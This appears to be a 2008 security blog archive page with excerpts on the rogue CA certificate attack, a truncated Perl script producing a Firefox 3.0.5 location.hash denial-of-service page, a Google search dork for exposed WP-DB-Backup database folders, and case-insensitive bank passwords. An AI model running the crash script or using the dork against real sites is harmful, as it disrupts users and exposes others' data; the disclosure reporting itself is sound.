Tuesday, December 30th, 2008
We have identified a vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites. As a proof of concept we executed a practical attack scenario and successfully created a rogue Certification Authority (CA) certificate trusted ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 30th, 2008
With the help of about 200 Sony PlayStations, an international team of security researchers has devised a way to undermine the algorithms used to protect secure Web sites and launch a nearly undetectable phishing attack.
To do this, they've exploited a bug in the digital certificates used by Web sites to ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008
#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP
$filename = $ARGV[0];
if(!defined($filename))
{
    print "Usage: $0 <filename.html>\n\n";
}
$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Sunday, December 14th, 2008
Older versions of the popular WordPress plugin WP-DB-Backup leave a copy of your entire database in a public folder for all to see. The databases were stored in wp-content/backup/, and a quick Google search today still returns many databases of sites, including some as recent as a few days ago:
http://www.google.com/search?num=100&hl=en&suggon=0&safe=off&q=intitle%3A%22index+of+%2Fwp-content%2Fbackup%22&btnG=Search
For ...
Posted in Coding, Internet, Privacy, Security, Software | No Comments
Friday, September 5th, 2008
I just heard on the Security Now podcast a listener mention that his Wells Fargo password was not case-sensitive. I'm not a Wells Fargo user but several users who are that I asked this morning actually confirmed this. You will be logged in no matter what case you enter into ...
Posted in Coding, Internet, Privacy, Security | No Comments